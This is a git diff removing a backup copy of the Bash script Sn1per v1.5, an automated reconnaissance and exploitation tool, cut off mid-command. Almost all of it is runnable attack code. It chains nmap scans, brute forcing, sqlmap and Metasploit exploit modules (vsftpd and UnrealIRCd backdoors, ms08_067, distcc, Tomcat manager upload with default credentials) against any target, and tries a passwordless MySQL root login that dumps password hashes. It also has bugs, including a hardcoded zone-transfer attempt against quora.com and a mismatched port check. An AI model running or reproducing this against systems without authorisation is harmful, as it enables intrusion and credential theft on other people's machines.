diff --git a/sniper~ b/sniper~ deleted file mode 100644 index a37646e..0000000 --- a/sniper~ +++ /dev/null @@ -1,666 +0,0 @@ -#!/bin/bash -# + -- --=[Sn1per v1.5 by 1N3 -# + -- --=[http://crowdshield.com -# -# Sn1per - Automated Pentest Recon Tool -# -# FEATURED: -# - Automatically collect recon info (ie. whois, ping, DNS, etc.) -# - Automatically collects Google hacking recon info -# - Automatically run port scans -# - Automatically brute force sub-domains via DNS -# - Automatically run targeted nmap scripts against open ports -# - Automatically scans all web applications -# - Automatically brute forces all open services -# - Automatically runs targeted metasploit scan and exploit modules -# -# INSTALL: -# ./install.sh - Installs all dependencies. Best run from Kali Linux. -# -# USAGE: -# ./sn1per -# - -SNIPER_DIR="/pentest/web/Sn1per/" # SET SNIPER INSTALL DIR -TARGET="$1" -LOOT_DIR="loot" -CMSMAP="CMSmap/cmsmap.py" -SAMRDUMP="bin/samrdump.py" -DNSDICT6="bin/dnsdict6" -INURLBR="bin/inurlbr.php" -USER_FILE="BruteX/wordlists/simple-users.txt" -PASS_FILE="BruteX/wordlists/password.lst" -DNS_FILE="BruteX/wordlists/namelist.txt" -SUPER_MICRO_SCAN="SuperMicro-Password-Scanner/supermicro_scan.sh" -THREADS="30" -OKBLUE='\033[94m' -OKRED='\033[91m' -OKGREEN='\033[92m' -OKORANGE='\033[93m' -RESET='\e[0m' - -if [ -z $TARGET ]; then - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo -e "$RESET" - echo -e "$OKORANGE + -- --=[http://crowdshield.com" - echo -e "$OKORANGE + -- --=[sn1per v1.5 by 1N3" - echo -e "$OKORANGE + -- --=[Usage: sn1per " - exit -fi - -REGEX='^[0-9]+$' -if [[ ${TARGET:0:1} =~ $REGEX ]]; - then - SCAN_TYPE="IP" -else - SCAN_TYPE="DOMAIN" -fi - -if [ -x $SNIPER_DIR ]; then - cd $SNIPER_DIR -fi - -clear - -echo -e "$OKRED ____ $RESET" -echo -e "$OKRED _________ / _/___ ___ _____$RESET" -echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" -echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" -echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" -echo -e "$OKRED /_/ $RESET" -echo -e "$RESET" -echo -e "$OKORANGE + -- --=[http://crowdshield.com" -echo -e "$OKORANGE + -- --=[sn1per v1.5 by 1N3" -echo -e "$RESET" -echo -e "$OKGREEN################################### Running recon #################################$RESET" -nslookup $TARGET -host $TARGET -if [ $SCAN_TYPE == "DOMAIN" ]; -then - dig -x $TARGET - whois $TARGET - theHarvester -d $TARGET -b google - theHarvester -d $TARGET -b bing - theHarvester -d $TARGET -b linkedin - theHarvester -d $TARGET -b people123 - dnsrecon -d $TARGET - dnsrecon -d $TARGET -t zonewalk - dnsrecon -d quora.com -t axfr - dnsenum $TARGET -f BruteX/wordlists/namelist.txt - mv -f *_ips.txt loot/ 2>/dev/null - shodan host $TARGET -fi -echo "" -echo -e "$OKGREEN################################### Pinging host ###################################$RESET" -ping -c 1 $TARGET -echo "" -echo -e "$OKGREEN################################### Running port scan ##############################$RESET" -nmap -sS -sV -T4 -A -O -p 1-65535 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml -nmap -sU -sV -T4 -A -O -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 --open $TARGET -echo "" -echo -e "$OKGREEN################################### Running Intrusive Scans ########################$RESET" -port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_53=`grep 'portid="53"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_79=`grep 'portid="79"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_80=`grep 'portid="80"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_111=`grep 'portid="111"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_135=`grep 'portid="135"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_389=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_514=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` -port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap-$TARGET.xml | grep open` - -if [ -z "$port_21" ] -then - echo -e "$OKRED+ -- --=[Port 21 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 21 opened... running tests...$RESET" - nmap -sV -sC -p 21 --script=ftp-* $TARGET - msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" -fi - -if [ -z "$port_22" ] -then - echo -e "$OKRED+ -- --=[Port 22 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 22 opened... running tests...$RESET" - nmap -sV -sC -p 22 --script=ssh-* $TARGET - msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;" -fi - -if [ -z "$port_23" ] -then - echo -e "$OKRED+ -- --=[Port 23 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 23 opened... running tests...$RESET" - echo "" - cisco-torch -A $TARGET - nmap -sV --script=telnet* -p 23 $TARGET - msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;" -fi - -if [ -z "$port_25" ] -then - echo -e "$OKRED+ -- --=[Port 25 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 25 opened... running tests...$RESET" - nmap -sV --script=smtp* -p 25 $TARGET - smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET - msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" -fi - -if [ -z "$port_53" ] -then - echo -e "$OKRED+ -- --=[Port 53 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 53 opened... running tests...$RESET" - nmap -sV --script=dns* -p U:53,T:53 $TARGET -fi - -if [ -z "$port_79" ] -then - echo -e "$OKRED+ -- --=[Port 79 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 79 opened... running tests...$RESET" - nmap -sV --script=finger* -p 79 $TARGET - bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt -fi - -if [ -z "$port_80" ] -then - echo -e "$OKRED+ -- --=[Port 80 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 80 opened... running tests...$RESET" - wafw00f http://$TARGET - echo "" - whatweb http://$TARGET - xsstracer $TARGET 80 - echo "" - - if [ $SCAN_TYPE == "DOMAIN" ]; - then - goohak $TARGET > /dev/null - php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt - rm -Rf output/ cookie.txt exploits.conf - - fi - - nmap -sV -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET - echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" - curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/robots.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 - curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Rom-0 Router Vulnerabilities on $TARGET...$RESET $OKORANGE" - curl -s --insecure http://$TARGET/rom-0 | grep 200 | tail -n 10 - echo "" - echo -e "$RESET" - - nikto -h http://$TARGET - wpscan --url http://$TARGET --batch - python $CMSMAP -t http://$TARGET - arachni http://$TARGET --output-only-positives --scope-include-subdomains - sqlmap -u "http://$TARGET" --batch --crawl=2 -f - msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" -fi - -if [ -z "$port_110" ] -then - echo -e "$OKRED+ -- --=[Port 110 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 110 opened... running tests...$RESET" - nmap -sV --script=pop* -p 110 $TARGET -fi - -if [ -z "$port_111" ] -then - echo -e "$OKRED+ -- --=[Port 111 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 111 opened... running tests...$RESET" - showmount -a $TARGET - showmount -d $TARGET - showmount -e $TARGET -fi - -if [ -z "$port_135" ] -then - echo -e "$OKRED+ -- --=[Port 135 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 135 opened... running tests...$RESET" - rpcinfo -p $TARGET - nmap -p 135 --script=rpc* $TARGET -fi - -if [ -z "$port_139" ] -then - echo -e "$OKRED+ -- --=[Port 139 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 139 opened... running tests...$RESET" - enum4linux $TARGET - python $SAMRDUMP $TARGET - nbtscan $TARGET - nmap -sV -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET - msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" -fi - -if [ -z "$port_162" ] -then - echo -e "$OKRED+ -- --=[Port 162 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 162 opened... running tests...$RESET" - for a in `cat BruteX/wordlists/snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done; - nmap -p 162 --script=snmp* $TARGET -fi - -if [ -z "$port_389" ] -then - echo -e "$OKRED+ -- --=[Port 389 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 389 opened... running tests...$RESET" - nmap -p 389 --script=ldap* $TARGET -fi - -if [ -z "$port_443" ] -then - echo -e "$OKRED+ -- --=[Port 443 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 443 opened... running tests...$RESET" - wafw00f https://$TARGET - echo "" - whatweb https://$TARGET - echo "" - sslscan --no-failed $TARGET - echo "" - cd MassBleed - ./massbleed $TARGET port 443 - cd .. - nmap -sV -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET - - if [ $SCAN_TYPE == "DOMAIN" ]; - then - goohak $TARGET > /dev/null - php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt - rm -Rf output/ cookie.txt exploits.conf - fi - - echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow - echo "" - echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE - echo "" - echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" - curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/robots.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 - curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 - echo "" - echo -e "$RESET" - nikto -h https://$TARGET - wpscan --url https://$TARGET --batch - python $CMSMAP -t https://$TARGET - arachni https://$TARGET --output-only-positives --scope-include-subdomains - sqlmap -u "https://$TARGET" --batch --crawl=2 -f - msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" -fi - -if [ -z "$port_445" ] -then - echo -e "$OKRED+ -- --=[Port 445 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 445 opened... running tests...$RESET" - enum4linux $TARGET - python $SAMRDUMP $TARGET - nbtscan $TARGET - nmap -sV -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET - msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" -fi - -if [ -z "$port_512" ] -then - echo -e "$OKRED+ -- --=[Port 512 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 512 opened... running tests...$RESET" - nmap -sV -p 512 --script=rexec* $TARGET -fi - -if [ -z "$port_513" ] -then - echo -e "$OKRED+ -- --=[Port 513 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 513 opened... running tests...$RESET" - nmap -sV -p 513 --script=rexec* $TARGET -fi - -if [ -z "$port_514" ] -then - echo -e "$OKRED+ -- --=[Port 514 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 514 opened... running tests...$RESET" - amap $TARGET 514 -A -fi - -if [ -z "$port_514" ] -then - echo -e "$OKRED+ -- --=[Port 514 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 514 opened... running tests...$RESET" - amap -A $TARGET 1524 -fi - -if [ -z "$port_2049" ] -then - echo -e "$OKRED+ -- --=[Port 2049 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 2049 opened... running tests...$RESET" - nmap -sV --script=nfs* -p 2049 $TARGET - rpcinfo -p $TARGET - showmount -e $TARGET - smbclient -L $TARGET -U " "%" " -fi - -if [ -z "$port_2121" ] -then - echo -e "$OKRED+ -- --=[Port 2121 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 2121 opened... running tests...$RESET" - nmap -sV --script=ftp* -p 2121 $TARGET - msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" -fi - -if [ -z "$port_3306" ] -then - echo -e "$OKRED+ -- --=[Port 3306 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 3306 opened... running tests...$RESET" - nmap -sV --script=mysql* -p 3306 $TARGET - mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;' -fi - -if [ -z "$port_3389" ] -then - echo -e "$OKRED+ -- --=[Port 3389 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 3389 opened... running tests...$RESET" - nmap -sV --script=rdp-* -p 3389 $TARGET -fi - -if [ -z "$port_3632" ] -then - echo -e "$OKRED+ -- --=[Port 3632 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 3632 opened... running tests...$RESET" - nmap -sV --script=distcc-* -p 3632 $TARGET - msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;" -fi - -if [ -z "$port_5432" ] -then - echo -e "$OKRED+ -- --=[Port 5432 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 5432 opened... running tests...$RESET" - nmap -sV --script=pgsql-brute -p 5432 $TARGET -fi - -if [ -z "$port_5800" ] -then - echo -e "$OKRED+ -- --=[Port 5800 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 5800 opened... running tests...$RESET" - nmap -sV --script=vnc* -p 5800 $TARGET -fi - -if [ -z "$port_5900" ] -then - echo -e "$OKRED+ -- --=[Port 5900 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 5900 opened... running tests...$RESET" - nmap -sV --script=vnc* -p 5900 $TARGET -fi - -if [ -z "$port_6000" ] -then - echo -e "$OKRED+ -- --=[Port 6000 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 6000 opened... running tests...$RESET" - nmap -sV --script=x11* -p 6000 $TARGET -fi - -if [ -z "$port_6667" ] -then - echo -e "$OKRED+ -- --=[Port 6667 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 6667 opened... running tests...$RESET" - nmap -sV --script=irc* -p 6667 $TARGET - msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" -fi - -if [ -z "$port_8000" ] -then - echo -e "$OKRED+ -- --=[Port 8000 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 8000 opened... running tests...$RESET" - wafw00f http://$TARGET:8000 - echo "" - whatweb http://$TARGET:8000 - echo "" - xsstracer $TARGET 8000 - sslscan --no-failed $TARGET:8000 - cd MassBleed - ./massbleed $TARGET port 8000 - cd .. - nikto -h http://$TARGET:8000 - arachni http://$TARGET:8000 --output-only-positives --scope-include-subdomains -fi - -if [ -z "$port_8100" ] -then - echo -e "$OKRED+ -- --=[Port 8100 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 8100 opened... running tests...$RESET" - wafw00f http://$TARGET:8100 - echo "" - whatweb http://$TARGET:8100 - echo "" - xsstracer $TARGET 8100 - sslscan --no-failed $TARGET:8100 - cd MassBleed - ./massbleed $TARGET port 8100 - cd .. - nikto -h http://$TARGET:8100 - arachni http://$TARGET:8100 --output-only-positives --scope-include-subdomains -fi - -if [ -z "$port_8080" ] -then - echo -e "$OKRED+ -- --=[Port 8080 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 8080 opened... running tests...$RESET" - wafw00f http://$TARGET:8080 - echo "" - whatweb http://$TARGET:8080 - echo "" - xsstracer $TARGET 8080 - sslscan --no-failed $TARGET:8080 - cd MassBleed - ./massbleed $TARGET port 8080 - cd .. - nikto -h http://$TARGET:8080 - nmap -p 8080 --script=*proxy* $TARGET - arachni http://$TARGET:8080 --output-only-positives --scope-include-subdomains - msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" -fi - -if [ -z "$port_8180" ] -then - echo -e "$OKRED+ -- --=[Port 8180 closed... skipping.$RESET" -else - echo -e "$OKGREEN+ -- --=[Port 8180 opened... running tests...$RESET" - wafw00f http://$TARGET:8180 - echo "" - whatweb http://$TARGET:8180 - echo "" - xsstracer $TARGET 8180 - sslscan --no-failed $TARGET:8180 - cd MassBleed - ./massbleed $TARGET port 8180 - cd .. - nikto -h http://$TARGET:8180 - nmap -p 8180 --script=*proxy* $TARGET - arachni http://$TARGET:8180 --output-only-positives --scope-include-subdomains - msfconsole -x "use admin/http/tomcat_administration; setg 